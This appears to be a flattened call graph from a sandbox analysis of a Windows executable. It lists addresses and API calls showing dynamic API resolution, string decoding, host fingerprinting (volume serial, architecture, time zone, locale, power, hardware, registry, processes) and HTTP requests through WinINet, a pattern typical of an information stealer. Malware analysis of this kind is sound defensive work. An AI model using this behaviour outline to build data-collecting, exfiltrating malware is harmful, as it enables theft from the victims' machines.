14501 8b45c0 2 API calls 14500->14501 14502 8b420c 14501->14502 14503 8b45c0 2 API calls 14502->14503 14504 8b4225 14503->14504 14505 8b45c0 2 API calls 14504->14505 14506 8b423e 14505->14506 14507 8b45c0 2 API calls 14506->14507 14508 8b4257 14507->14508 14509 8b45c0 2 API calls 14508->14509 14510 8b4270 14509->14510 14511 8b45c0 2 API calls 14510->14511 14512 8b4289 14511->14512 14513 8b45c0 2 API calls 14512->14513 14514 8b42a2 14513->14514 14515 8b45c0 2 API calls 14514->14515 14516 8b42bb 14515->14516 14517 8b45c0 2 API calls 14516->14517 14518 8b42d4 14517->14518 14519 8b45c0 2 API calls 14518->14519 14520 8b42ed 14519->14520 14521 8b45c0 2 API calls 14520->14521 14522 8b4306 14521->14522 14523 8b45c0 2 API calls 14522->14523 14524 8b431f 14523->14524 14525 8b45c0 2 API calls 14524->14525 14526 8b4338 14525->14526 14527 8b45c0 2 API calls 14526->14527 14528 8b4351 14527->14528 14529 8b45c0 2 API calls 14528->14529 14530 8b436a 14529->14530 14531 8b45c0 2 API calls 14530->14531 14532 8b4383 14531->14532 14533 8b45c0 2 API calls 14532->14533 14534 8b439c 14533->14534 14535 8b45c0 2 API calls 14534->14535 14536 8b43b5 14535->14536 14537 8b45c0 2 API calls 14536->14537 14538 8b43ce 14537->14538 14539 8b45c0 2 API calls 14538->14539 14540 8b43e7 14539->14540 14541 8b45c0 2 API calls 14540->14541 14542 8b4400 14541->14542 14543 8b45c0 2 API calls 14542->14543 14544 8b4419 14543->14544 14545 8b45c0 2 API calls 14544->14545 14546 8b4432 14545->14546 14547 8b45c0 2 API calls 14546->14547 14548 8b444b 14547->14548 14549 8b45c0 2 API calls 14548->14549 14550 8b4464 14549->14550 14551 8b45c0 2 API calls 14550->14551 14552 8b447d 14551->14552 14553 8b45c0 2 API calls 14552->14553 14554 8b4496 14553->14554 14555 8b45c0 2 API calls 14554->14555 14556 8b44af 14555->14556 14557 8b45c0 2 API calls 14556->14557 14558 8b44c8 14557->14558 14559 8b45c0 2 API calls 14558->14559 14560 8b44e1 14559->14560 14561 8b45c0 2 API calls 14560->14561 14562 8b44fa 14561->14562 14563 8b45c0 2 API calls 14562->14563 14564 8b4513 14563->14564 14565 8b45c0 2 API calls 14564->14565 14566 8b452c 14565->14566 14567 8b45c0 2 API calls 14566->14567 14568 8b4545 14567->14568 14569 8b45c0 2 API calls 14568->14569 14570 8b455e 14569->14570 14571 8b45c0 2 API calls 14570->14571 14572 8b4577 14571->14572 14573 8b45c0 2 API calls 14572->14573 14574 8b4590 14573->14574 14575 8b45c0 2 API calls 14574->14575 14576 8b45a9 14575->14576 14577 8c9c10 14576->14577 14578 8ca036 8 API calls 14577->14578 14579 8c9c20 43 API calls 14577->14579 14580 8ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14578->14580 14581 8ca146 14578->14581 14579->14578 14580->14581 14582 8ca216 14581->14582 14583 8ca153 8 API calls 14581->14583 14584 8ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14582->14584 14585 8ca298 14582->14585 14583->14582 14584->14585 14586 8ca2a5 6 API calls 14585->14586 14587 8ca337 14585->14587 14586->14587 14588 8ca41f 14587->14588 14589 8ca344 9 API calls 14587->14589 14590 8ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14590 14591 8ca4a2 14588->14591 14589->14588 14590->14591 14592 8ca4dc 14591->14592 14593 8ca4ab GetProcAddress GetProcAddress 14591->14593 14594 8ca515 14592->14594 14595 8ca4e5 GetProcAddress GetProcAddress 14592->14595 14593->14592 14596 8ca612 14594->14596 14597 8ca522 10 API calls 14594->14597 14595->14594 14598 8ca67d 14596->14598 14599 8ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14596->14599 14597->14596 14600 8ca69e 14598->14600 14601 8ca686 GetProcAddress 14598->14601 14599->14598 14602 8c5ca3 14600->14602 14603 8ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14600->14603 14601->14600 14604 8b1590 14602->14604 14603->14602 15725 8b1670 14604->15725 14607 8ca7a0 lstrcpy 14608 8b15b5 14607->14608 14609 8ca7a0 lstrcpy 14608->14609 14610 8b15c7 14609->14610 14611 8ca7a0 lstrcpy 14610->14611 14612 8b15d9 14611->14612 14613 8ca7a0 lstrcpy 14612->14613 14614 8b1663 14613->14614 14615 8c5510 14614->14615 14616 8c5521 14615->14616 14617 8ca820 2 API calls 14616->14617 14618 8c552e 14617->14618 14619 8ca820 2 API calls 14618->14619 14620 8c553b 14619->14620 14621 8ca820 2 API calls 14620->14621 14622 8c5548 14621->14622 14623 8ca740 lstrcpy 14622->14623 14624 8c5555 14623->14624 14625 8ca740 lstrcpy 14624->14625 14626 8c5562 14625->14626 14627 8ca740 lstrcpy 14626->14627 14628 8c556f 14627->14628 14629 8ca740 lstrcpy 14628->14629 14667 8c557c 14629->14667 14630 8ca7a0 lstrcpy 14630->14667 14631 8ca740 lstrcpy 14631->14667 14632 8c5643 StrCmpCA 14632->14667 14633 8c56a0 StrCmpCA 14634 8c57dc 14633->14634 14633->14667 14635 8ca8a0 lstrcpy 14634->14635 14636 8c57e8 14635->14636 14637 8ca820 2 API calls 14636->14637 14639 8c57f6 14637->14639 14638 8ca820 lstrlen lstrcpy 14638->14667 14642 8ca820 2 API calls 14639->14642 14640 8c5856 StrCmpCA 14643 8c5991 14640->14643 14640->14667 14641 8c51f0 20 API calls 14641->14667 14645 8c5805 14642->14645 14644 8ca8a0 lstrcpy 14643->14644 14646 8c599d 14644->14646 14647 8b1670 lstrcpy 14645->14647 14649 8ca820 2 API calls 14646->14649 14669 8c5811 14647->14669 14648 8b1590 lstrcpy 14648->14667 14650 8c59ab 14649->14650 14653 8ca820 2 API calls 14650->14653 14651 8c5a0b StrCmpCA 14654 8c5a28 14651->14654 14655 8c5a16 Sleep 14651->14655 14652 8c52c0 25 API calls 14652->14667 14656 8c59ba 14653->14656 14657 8ca8a0 lstrcpy 14654->14657 14655->14667 14658 8b1670 lstrcpy 14656->14658 14659 8c5a34 14657->14659 14658->14669 14660 8ca820 2 API calls 14659->14660 14661 8c5a43 14660->14661 14662 8ca820 2 API calls 14661->14662 14663 8c5a52 14662->14663 14666 8b1670 lstrcpy 14663->14666 14664 8ca8a0 lstrcpy 14664->14667 14665 8c578a StrCmpCA 14665->14667 14666->14669 14667->14630 14667->14631 14667->14632 14667->14633 14667->14638 14667->14640 14667->14641 14667->14648 14667->14651 14667->14652 14667->14664 14667->14665 14668 8c593f StrCmpCA 14667->14668 14668->14667 14669->13722 14671 8c754c 14670->14671 14672 8c7553 GetVolumeInformationA 14670->14672 14671->14672 14673 8c7591 14672->14673 14674 8c75fc GetProcessHeap RtlAllocateHeap 14673->14674 14675 8c7628 wsprintfA 14674->14675 14676 8c7619 14674->14676 14677 8ca740 lstrcpy 14675->14677 14678 8ca740 lstrcpy 14676->14678 14679 8c5da7 14677->14679 14678->14679 14679->13743 14681 8ca7a0 lstrcpy 14680->14681 14682 8b4899 14681->14682 15734 8b47b0 14682->15734 14684 8b48a5 14685 8ca740 lstrcpy 14684->14685 14686 8b48d7 14685->14686 14687 8ca740 lstrcpy 14686->14687 14688 8b48e4 14687->14688 14689 8ca740 lstrcpy 14688->14689 14690 8b48f1 14689->14690 14691 8ca740 lstrcpy 14690->14691 14692 8b48fe 14691->14692 14693 8ca740 lstrcpy 14692->14693 14694 8b490b InternetOpenA StrCmpCA 14693->14694 14695 8b4944 14694->14695 14696 8b4ecb InternetCloseHandle 14695->14696 15740 8c8b60 14695->15740 14698 8b4ee8 14696->14698 15755 8b9ac0 CryptStringToBinaryA 14698->15755 14699 8b4963 15748 8ca920 14699->15748 14702 8b4976 14704 8ca8a0 lstrcpy 14702->14704 14709 8b497f 14704->14709 14705 8ca820 2 API calls 14706 8b4f05 14705->14706 14708 8ca9b0 4 API calls 14706->14708 14707 8b4f27 ctype 14711 8ca7a0 lstrcpy 14707->14711 14710 8b4f1b 14708->14710 14713 8ca9b0 4 API calls 14709->14713 14712 8ca8a0 lstrcpy 14710->14712 14724 8b4f57 14711->14724 14712->14707 14714 8b49a9 14713->14714 14715 8ca8a0 lstrcpy 14714->14715 14716 8b49b2 14715->14716 14717 8ca9b0 4 API calls 14716->14717 14718 8b49d1 14717->14718 14719 8ca8a0 lstrcpy 14718->14719 14720 8b49da 14719->14720 14721 8ca920 3 API calls 14720->14721 14722 8b49f8 14721->14722 14723 8ca8a0 lstrcpy 14722->14723 14725 8b4a01 14723->14725 14724->13746 14726 8ca9b0 4 API calls 14725->14726 14727 8b4a20 14726->14727 14728 8ca8a0 lstrcpy 14727->14728 14729 8b4a29 14728->14729 14730 8ca9b0 4 API calls 14729->14730 14731 8b4a48 14730->14731 14732 8ca8a0 lstrcpy 14731->14732 14733 8b4a51 14732->14733 14734 8ca9b0 4 API calls 14733->14734 14735 8b4a7d 14734->14735 14736 8ca920 3 API calls 14735->14736 14737 8b4a84 14736->14737 14738 8ca8a0 lstrcpy 14737->14738 14739 8b4a8d 14738->14739 14740 8b4aa3 InternetConnectA 14739->14740 14740->14696 14741 8b4ad3 HttpOpenRequestA 14740->14741 14743 8b4b28 14741->14743 14744 8b4ebe InternetCloseHandle 14741->14744 14745 8ca9b0 4 API calls 14743->14745 14744->14696 14746 8b4b3c 14745->14746 14747 8ca8a0 lstrcpy 14746->14747 14748 8b4b45 14747->14748 14749 8ca920 3 API calls 14748->14749 14750 8b4b63 14749->14750 14751 8ca8a0 lstrcpy 14750->14751 14752 8b4b6c 14751->14752 14753 8ca9b0 4 API calls 14752->14753 14754 8b4b8b 14753->14754 14755 8ca8a0 lstrcpy 14754->14755 14756 8b4b94 14755->14756 14757 8ca9b0 4 API calls 14756->14757 14758 8b4bb5 14757->14758 14759 8ca8a0 lstrcpy 14758->14759 14760 8b4bbe 14759->14760 14761 8ca9b0 4 API calls 14760->14761 14762 8b4bde 14761->14762 14763 8ca8a0 lstrcpy 14762->14763 14764 8b4be7 14763->14764 14765 8ca9b0 4 API calls 14764->14765 14766 8b4c06 14765->14766 14767 8ca8a0 lstrcpy 14766->14767 14768 8b4c0f 14767->14768 14769 8ca920 3 API calls 14768->14769 14770 8b4c2d 14769->14770 14771 8ca8a0 lstrcpy 14770->14771 14772 8b4c36 14771->14772 14773 8ca9b0 4 API calls 14772->14773 14774 8b4c55 14773->14774 14775 8ca8a0 lstrcpy 14774->14775 14776 8b4c5e 14775->14776 14777 8ca9b0 4 API calls 14776->14777 14778 8b4c7d 14777->14778 14779 8ca8a0 lstrcpy 14778->14779 14780 8b4c86 14779->14780 14781 8ca920 3 API calls 14780->14781 14782 8b4ca4 14781->14782 14783 8ca8a0 lstrcpy 14782->14783 14784 8b4cad 14783->14784 14785 8ca9b0 4 API calls 14784->14785 14786 8b4ccc 14785->14786 14787 8ca8a0 lstrcpy 14786->14787 14788 8b4cd5 14787->14788 14789 8ca9b0 4 API calls 14788->14789 14790 8b4cf6 14789->14790 14791 8ca8a0 lstrcpy 14790->14791 14792 8b4cff 14791->14792 14793 8ca9b0 4 API calls 14792->14793 14794 8b4d1f 14793->14794 14795 8ca8a0 lstrcpy 14794->14795 14796 8b4d28 14795->14796 14797 8ca9b0 4 API calls 14796->14797 14798 8b4d47 14797->14798 14799 8ca8a0 lstrcpy 14798->14799 14800 8b4d50 14799->14800 14801 8ca920 3 API calls 14800->14801 14802 8b4d6e 14801->14802 14803 8ca8a0 lstrcpy 14802->14803 14804 8b4d77 14803->14804 14805 8ca740 lstrcpy 14804->14805 14806 8b4d92 14805->14806 14807 8ca920 3 API calls 14806->14807 14808 8b4db3 14807->14808 14809 8ca920 3 API calls 14808->14809 14810 8b4dba 14809->14810 14811 8ca8a0 lstrcpy 14810->14811 14812 8b4dc6 14811->14812 14813 8b4de7 lstrlen 14812->14813 14814 8b4dfa 14813->14814 14815 8b4e03 lstrlen 14814->14815 15754 8caad0 14815->15754 14817 8b4e13 HttpSendRequestA 14818 8b4e32 InternetReadFile 14817->14818 14819 8b4e67 InternetCloseHandle 14818->14819 14824 8b4e5e 14818->14824 14821 8ca800 14819->14821 14821->14744 14822 8ca9b0 4 API calls 14822->14824 14823 8ca8a0 lstrcpy 14823->14824 14824->14818 14824->14819 14824->14822 14824->14823 15761 8caad0 14825->15761 14827 8c17c4 StrCmpCA 14828 8c17cf ExitProcess 14827->14828 14832 8c17d7 14827->14832 14829 8c19c2 14829->13748 14830 8c18ad StrCmpCA 14830->14832 14831 8c18cf StrCmpCA 14831->14832 14832->14829 14832->14830 14832->14831 14833 8c185d StrCmpCA 14832->14833 14834 8c187f StrCmpCA 14832->14834 14835 8c1970 StrCmpCA 14832->14835 14836 8c18f1 StrCmpCA 14832->14836 14837 8c1951 StrCmpCA 14832->14837 14838 8c1932 StrCmpCA 14832->14838 14839 8c1913 StrCmpCA 14832->14839 14840 8ca820 lstrlen lstrcpy 14832->14840 14833->14832 14834->14832 14835->14832 14836->14832 14837->14832 14838->14832 14839->14832 14840->14832 14842 8ca7a0 lstrcpy 14841->14842 14843 8b5979 14842->14843 14844 8b47b0 2 API calls 14843->14844 14845 8b5985 14844->14845 14846 8ca740 lstrcpy 14845->14846 14847 8b59ba 14846->14847 14848 8ca740 lstrcpy 14847->14848 14849 8b59c7 14848->14849 14850 8ca740 lstrcpy 14849->14850 14851 8b59d4 14850->14851 14852 8ca740 lstrcpy 14851->14852 14853 8b59e1 14852->14853 14854 8ca740 lstrcpy 14853->14854 14855 8b59ee InternetOpenA StrCmpCA 14854->14855 14856 8b5a1d 14855->14856 14857 8b5fc3 InternetCloseHandle 14856->14857 14858 8c8b60 3 API calls 14856->14858 14859 8b5fe0 14857->14859 14860 8b5a3c 14858->14860 14861 8b9ac0 4 API calls 14859->14861 14862 8ca920 3 API calls 14860->14862 14864 8b5fe6 14861->14864 14863 8b5a4f 14862->14863 14865 8ca8a0 lstrcpy 14863->14865 14866 8ca820 2 API calls 14864->14866 14868 8b601f ctype 14864->14868 14870 8b5a58 14865->14870 14867 8b5ffd 14866->14867 14869 8ca9b0 4 API calls 14867->14869 14872 8ca7a0 lstrcpy 14868->14872 14871 8b6013 14869->14871 14874 8ca9b0 4 API calls 14870->14874 14873 8ca8a0 lstrcpy 14871->14873 14883 8b604f 14872->14883 14873->14868 14875 8b5a82 14874->14875 14876 8ca8a0 lstrcpy 14875->14876 14877 8b5a8b 14876->14877 14878 8ca9b0 4 API calls 14877->14878 14879 8b5aaa 14878->14879 14880 8ca8a0 lstrcpy 14879->14880 14881 8b5ab3 14880->14881 14882 8ca920 3 API calls 14881->14882 14884 8b5ad1 14882->14884 14883->13754 14885 8ca8a0 lstrcpy 14884->14885 14886 8b5ada 14885->14886 14887 8ca9b0 4 API calls 14886->14887 14888 8b5af9 14887->14888 14889 8ca8a0 lstrcpy 14888->14889 14890 8b5b02 14889->14890 14891 8ca9b0 4 API calls 14890->14891 14892 8b5b21 14891->14892 14893 8ca8a0 lstrcpy 14892->14893 14894 8b5b2a 14893->14894 14895 8ca9b0 4 API calls 14894->14895 14896 8b5b56 14895->14896 14897 8ca920 3 API calls 14896->14897 14898 8b5b5d 14897->14898 14899 8ca8a0 lstrcpy 14898->14899 14900 8b5b66 14899->14900 14901 8b5b7c InternetConnectA 14900->14901 14901->14857 14902 8b5bac HttpOpenRequestA 14901->14902 14904 8b5c0b 14902->14904 14905 8b5fb6 InternetCloseHandle 14902->14905 14906 8ca9b0 4 API calls 14904->14906 14905->14857 14907 8b5c1f 14906->14907 14908 8ca8a0 lstrcpy 14907->14908 14909 8b5c28 14908->14909 14910 8ca920 3 API calls 14909->14910 14911 8b5c46 14910->14911 14912 8ca8a0 lstrcpy 14911->14912 14913 8b5c4f 14912->14913 14914 8ca9b0 4 API calls 14913->14914 14915 8b5c6e 14914->14915 14916 8ca8a0 lstrcpy 14915->14916 14917 8b5c77 14916->14917 14918 8ca9b0 4 API calls 14917->14918 14919 8b5c98 14918->14919 14920 8ca8a0 lstrcpy 14919->14920 14921 8b5ca1 14920->14921 14922 8ca9b0 4 API calls 14921->14922 14923 8b5cc1 14922->14923 14924 8ca8a0 lstrcpy 14923->14924 14925 8b5cca 14924->14925 14926 8ca9b0 4 API calls 14925->14926 14927 8b5ce9 14926->14927 14928 8ca8a0 lstrcpy 14927->14928 14929 8b5cf2 14928->14929 14930 8ca920 3 API calls 14929->14930 14931 8b5d10 14930->14931 14932 8ca8a0 lstrcpy 14931->14932 14933 8b5d19 14932->14933 14934 8ca9b0 4 API calls 14933->14934 14935 8b5d38 14934->14935 14936 8ca8a0 lstrcpy 14935->14936 14937 8b5d41 14936->14937 14938 8ca9b0 4 API calls 14937->14938 14939 8b5d60 14938->14939 14940 8ca8a0 lstrcpy 14939->14940 14941 8b5d69 14940->14941 14942 8ca920 3 API calls 14941->14942 14943 8b5d87 14942->14943 14944 8ca8a0 lstrcpy 14943->14944 14945 8b5d90 14944->14945 14946 8ca9b0 4 API calls 14945->14946 14947 8b5daf 14946->14947 14948 8ca8a0 lstrcpy 14947->14948 14949 8b5db8 14948->14949 14950 8ca9b0 4 API calls 14949->14950 14951 8b5dd9 14950->14951 14952 8ca8a0 lstrcpy 14951->14952 14953 8b5de2 14952->14953 14954 8ca9b0 4 API calls 14953->14954 14955 8b5e02 14954->14955 14956 8ca8a0 lstrcpy 14955->14956 14957 8b5e0b 14956->14957 14958 8ca9b0 4 API calls 14957->14958 14959 8b5e2a 14958->14959 14960 8ca8a0 lstrcpy 14959->14960 14961 8b5e33 14960->14961 14962 8ca920 3 API calls 14961->14962 14963 8b5e54 14962->14963 14964 8ca8a0 lstrcpy 14963->14964 14965 8b5e5d 14964->14965 14966 8b5e70 lstrlen 14965->14966 15762 8caad0 14966->15762 14968 8b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15763 8caad0 14968->15763 14970 8b5eae lstrlen 14971 8b5ebe 14970->14971 14972 8b5ed7 lstrlen 14971->14972 14973 8b5ee7 14972->14973 14974 8b5ef0 lstrlen 14973->14974 14975 8b5f04 14974->14975 14976 8b5f1a lstrlen 14975->14976 15764 8caad0 14976->15764 14978 8b5f2a HttpSendRequestA 14979 8b5f35 InternetReadFile 14978->14979 14980 8b5f6a InternetCloseHandle 14979->14980 14984 8b5f61 14979->14984 14980->14905 14982 8ca9b0 4 API calls 14982->14984 14983 8ca8a0 lstrcpy 14983->14984 14984->14979 14984->14980 14984->14982 14984->14983 14986 8c1077 14985->14986 14987 8c1151 14986->14987 14988 8ca820 lstrlen lstrcpy 14986->14988 14987->13756 14988->14986 14990 8c0db7 14989->14990 14991 8c0f17 14990->14991 14992 8c0ea4 StrCmpCA 14990->14992 14993 8c0e27 StrCmpCA 14990->14993 14994 8c0e67 StrCmpCA 14990->14994 14995 8ca820 lstrlen lstrcpy 14990->14995 14991->13764 14992->14990 14993->14990 14994->14990 14995->14990 14997 8c0f67 14996->14997 14998 8c1044 14997->14998 14999 8c0fb2 StrCmpCA 14997->14999 15000 8ca820 lstrlen lstrcpy 14997->15000 14998->13772 14999->14997 15000->14997 15002 8ca740 lstrcpy 15001->15002 15003 8c1a26 15002->15003 15004 8ca9b0 4 API calls 15003->15004 15005 8c1a37 15004->15005 15006 8ca8a0 lstrcpy 15005->15006 15007 8c1a40 15006->15007 15008 8ca9b0 4 API calls 15007->15008 15009 8c1a5b 15008->15009 15010 8ca8a0 lstrcpy 15009->15010 15011 8c1a64 15010->15011 15012 8ca9b0 4 API calls 15011->15012 15013 8c1a7d 15012->15013 15014 8ca8a0 lstrcpy 15013->15014 15015 8c1a86 15014->15015 15016 8ca9b0 4 API calls 15015->15016 15017 8c1aa1 15016->15017 15018 8ca8a0 lstrcpy 15017->15018 15019 8c1aaa 15018->15019 15020 8ca9b0 4 API calls 15019->15020 15021 8c1ac3 15020->15021 15022 8ca8a0 lstrcpy 15021->15022 15023 8c1acc 15022->15023 15024 8ca9b0 4 API calls 15023->15024 15025 8c1ae7 15024->15025 15026 8ca8a0 lstrcpy 15025->15026 15027 8c1af0 15026->15027 15028 8ca9b0 4 API calls 15027->15028 15029 8c1b09 15028->15029 15030 8ca8a0 lstrcpy 15029->15030 15031 8c1b12 15030->15031 15032 8ca9b0 4 API calls 15031->15032 15033 8c1b2d 15032->15033 15034 8ca8a0 lstrcpy 15033->15034 15035 8c1b36 15034->15035 15036 8ca9b0 4 API calls 15035->15036 15037 8c1b4f 15036->15037 15038 8ca8a0 lstrcpy 15037->15038 15039 8c1b58 15038->15039 15040 8ca9b0 4 API calls 15039->15040 15041 8c1b76 15040->15041 15042 8ca8a0 lstrcpy 15041->15042 15043 8c1b7f 15042->15043 15044 8c7500 6 API calls 15043->15044 15045 8c1b96 15044->15045 15046 8ca920 3 API calls 15045->15046 15047 8c1ba9 15046->15047 15048 8ca8a0 lstrcpy 15047->15048 15049 8c1bb2 15048->15049 15050 8ca9b0 4 API calls 15049->15050 15051 8c1bdc 15050->15051 15052 8ca8a0 lstrcpy 15051->15052 15053 8c1be5 15052->15053 15054 8ca9b0 4 API calls 15053->15054 15055 8c1c05 15054->15055 15056 8ca8a0 lstrcpy 15055->15056 15057 8c1c0e 15056->15057 15765 8c7690 GetProcessHeap RtlAllocateHeap 15057->15765 15060 8ca9b0 4 API calls 15061 8c1c2e 15060->15061 15062 8ca8a0 lstrcpy 15061->15062 15063 8c1c37 15062->15063 15064 8ca9b0 4 API calls 15063->15064 15065 8c1c56 15064->15065 15066 8ca8a0 lstrcpy 15065->15066 15067 8c1c5f 15066->15067 15068 8ca9b0 4 API calls 15067->15068 15069 8c1c80 15068->15069 15070 8ca8a0 lstrcpy 15069->15070 15071 8c1c89 15070->15071 15772 8c77c0 GetCurrentProcess IsWow64Process 15071->15772 15074 8ca9b0 4 API calls 15075 8c1ca9 15074->15075 15076 8ca8a0 lstrcpy 15075->15076 15077 8c1cb2 15076->15077 15078 8ca9b0 4 API calls 15077->15078 15079 8c1cd1 15078->15079 15080 8ca8a0 lstrcpy 15079->15080 15081 8c1cda 15080->15081 15082 8ca9b0 4 API calls 15081->15082 15083 8c1cfb 15082->15083 15084 8ca8a0 lstrcpy 15083->15084 15085 8c1d04 15084->15085 15086 8c7850 3 API calls 15085->15086 15087 8c1d14 15086->15087 15088 8ca9b0 4 API calls 15087->15088 15089 8c1d24 15088->15089 15090 8ca8a0 lstrcpy 15089->15090 15091 8c1d2d 15090->15091 15092 8ca9b0 4 API calls 15091->15092 15093 8c1d4c 15092->15093 15094 8ca8a0 lstrcpy 15093->15094 15095 8c1d55 15094->15095 15096 8ca9b0 4 API calls 15095->15096 15097 8c1d75 15096->15097 15098 8ca8a0 lstrcpy 15097->15098 15099 8c1d7e 15098->15099 15100 8c78e0 3 API calls 15099->15100 15101 8c1d8e 15100->15101 15102 8ca9b0 4 API calls 15101->15102 15103 8c1d9e 15102->15103 15104 8ca8a0 lstrcpy 15103->15104 15105 8c1da7 15104->15105 15106 8ca9b0 4 API calls 15105->15106 15107 8c1dc6 15106->15107 15108 8ca8a0 lstrcpy 15107->15108 15109 8c1dcf 15108->15109 15110 8ca9b0 4 API calls 15109->15110 15111 8c1df0 15110->15111 15112 8ca8a0 lstrcpy 15111->15112 15113 8c1df9 15112->15113 15774 8c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15113->15774 15116 8ca9b0 4 API calls 15117 8c1e19 15116->15117 15118 8ca8a0 lstrcpy 15117->15118 15119 8c1e22 15118->15119 15120 8ca9b0 4 API calls 15119->15120 15121 8c1e41 15120->15121 15122 8ca8a0 lstrcpy 15121->15122 15123 8c1e4a 15122->15123 15124 8ca9b0 4 API calls 15123->15124 15125 8c1e6b 15124->15125 15126 8ca8a0 lstrcpy 15125->15126 15127 8c1e74 15126->15127 15776 8c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15127->15776 15130 8ca9b0 4 API calls 15131 8c1e94 15130->15131 15132 8ca8a0 lstrcpy 15131->15132 15133 8c1e9d 15132->15133 15134 8ca9b0 4 API calls 15133->15134 15135 8c1ebc 15134->15135 15136 8ca8a0 lstrcpy 15135->15136 15137 8c1ec5 15136->15137 15138 8ca9b0 4 API calls 15137->15138 15139 8c1ee5 15138->15139 15140 8ca8a0 lstrcpy 15139->15140 15141 8c1eee 15140->15141 15779 8c7b00 GetUserDefaultLocaleName 15141->15779 15144 8ca9b0 4 API calls 15145 8c1f0e 15144->15145 15146 8ca8a0 lstrcpy 15145->15146 15147 8c1f17 15146->15147 15148 8ca9b0 4 API calls 15147->15148 15149 8c1f36 15148->15149 15150 8ca8a0 lstrcpy 15149->15150 15151 8c1f3f 15150->15151 15152 8ca9b0 4 API calls 15151->15152 15153 8c1f60 15152->15153 15154 8ca8a0 lstrcpy 15153->15154 15155 8c1f69 15154->15155 15783 8c7b90 15155->15783 15157 8c1f80 15158 8ca920 3 API calls 15157->15158 15159 8c1f93 15158->15159 15160 8ca8a0 lstrcpy 15159->15160 15161 8c1f9c 15160->15161 15162 8ca9b0 4 API calls 15161->15162 15163 8c1fc6 15162->15163 15164 8ca8a0 lstrcpy 15163->15164 15165 8c1fcf 15164->15165 15166 8ca9b0 4 API calls 15165->15166 15167 8c1fef 15166->15167 15168 8ca8a0 lstrcpy 15167->15168 15169 8c1ff8 15168->15169 15795 8c7d80 GetSystemPowerStatus 15169->15795 15172 8ca9b0 4 API calls 15173 8c2018 15172->15173 15174 8ca8a0 lstrcpy 15173->15174 15175 8c2021 15174->15175 15176 8ca9b0 4 API calls 15175->15176 15177 8c2040 15176->15177 15178 8ca8a0 lstrcpy 15177->15178 15179 8c2049 15178->15179 15180 8ca9b0 4 API calls 15179->15180 15181 8c206a 15180->15181 15182 8ca8a0 lstrcpy 15181->15182 15183 8c2073 15182->15183 15184 8c207e GetCurrentProcessId 15183->15184 15797 8c9470 OpenProcess 15184->15797 15187 8ca920 3 API calls 15188 8c20a4 15187->15188 15189 8ca8a0 lstrcpy 15188->15189 15190 8c20ad 15189->15190 15191 8ca9b0 4 API calls 15190->15191 15192 8c20d7 15191->15192 15193 8ca8a0 lstrcpy 15192->15193 15194 8c20e0 15193->15194 15195 8ca9b0 4 API calls 15194->15195 15196 8c2100 15195->15196 15197 8ca8a0 lstrcpy 15196->15197 15198 8c2109 15197->15198 15802 8c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15198->15802 15201 8ca9b0 4 API calls 15202 8c2129 15201->15202 15203 8ca8a0 lstrcpy 15202->15203 15204 8c2132 15203->15204 15205 8ca9b0 4 API calls 15204->15205 15206 8c2151 15205->15206 15207 8ca8a0 lstrcpy 15206->15207 15208 8c215a 15207->15208 15209 8ca9b0 4 API calls 15208->15209 15210 8c217b 15209->15210 15211 8ca8a0 lstrcpy 15210->15211 15212 8c2184 15211->15212 15806 8c7f60 15212->15806 15215 8ca9b0 4 API calls 15216 8c21a4 15215->15216 15217 8ca8a0 lstrcpy 15216->15217 15218 8c21ad 15217->15218 15219 8ca9b0 4 API calls 15218->15219 15220 8c21cc 15219->15220 15221 8ca8a0 lstrcpy 15220->15221 15222 8c21d5 15221->15222 15223 8ca9b0 4 API calls 15222->15223 15224 8c21f6 15223->15224 15225 8ca8a0 lstrcpy 15224->15225 15226 8c21ff 15225->15226 15819 8c7ed0 GetSystemInfo wsprintfA 15226->15819 15229 8ca9b0 4 API calls 15230 8c221f 15229->15230 15231 8ca8a0 lstrcpy 15230->15231 15232 8c2228 15231->15232 15233 8ca9b0 4 API calls 15232->15233 15234 8c2247 15233->15234 15235 8ca8a0 lstrcpy 15234->15235 15236 8c2250 15235->15236 15237 8ca9b0 4 API calls 15236->15237 15238 8c2270 15237->15238 15239 8ca8a0 lstrcpy 15238->15239 15240 8c2279 15239->15240 15821 8c8100 GetProcessHeap RtlAllocateHeap 15240->15821 15243 8ca9b0 4 API calls 15244 8c2299 15243->15244 15245 8ca8a0 lstrcpy 15244->15245 15246 8c22a2 15245->15246 15247 8ca9b0 4 API calls 15246->15247 15248 8c22c1 15247->15248 15249 8ca8a0 lstrcpy 15248->15249 15250 8c22ca 15249->15250 15251 8ca9b0 4 API calls 15250->15251 15252 8c22eb 15251->15252 15253 8ca8a0 lstrcpy 15252->15253 15254 8c22f4 15253->15254 15827 8c87c0 15254->15827 15257 8ca920 3 API calls 15258 8c231e 15257->15258 15259 8ca8a0 lstrcpy 15258->15259 15260 8c2327 15259->15260 15261 8ca9b0 4 API calls 15260->15261 15262 8c2351 15261->15262 15263 8ca8a0 lstrcpy 15262->15263 15264 8c235a 15263->15264 15265 8ca9b0 4 API calls 15264->15265 15266 8c237a 15265->15266 15267 8ca8a0 lstrcpy 15266->15267 15268 8c2383 15267->15268 15269 8ca9b0 4 API calls 15268->15269 15270 8c23a2 15269->15270 15271 8ca8a0 lstrcpy 15270->15271 15272 8c23ab 15271->15272 15832 8c81f0 15272->15832 15274 8c23c2 15275 8ca920 3 API calls 15274->15275 15276 8c23d5 15275->15276 15277 8ca8a0 lstrcpy 15276->15277 15278 8c23de 15277->15278 15279 8ca9b0 4 API calls 15278->15279 15280 8c240a 15279->15280 15281 8ca8a0 lstrcpy 15280->15281 15282 8c2413 15281->15282 15283 8ca9b0 4 API calls 15282->15283 15284 8c2432 15283->15284 15285 8ca8a0 lstrcpy 15284->15285 15286 8c243b 15285->15286 15287 8ca9b0 4 API calls 15286->15287 15288 8c245c 15287->15288 15289 8ca8a0 lstrcpy 15288->15289 15290 8c2465 15289->15290 15291 8ca9b0 4 API calls 15290->15291 15292 8c2484 15291->15292 15293 8ca8a0 lstrcpy 15292->15293 15294 8c248d 15293->15294 15295 8ca9b0 4 API calls 15294->15295 15296 8c24ae 15295->15296 15297 8ca8a0 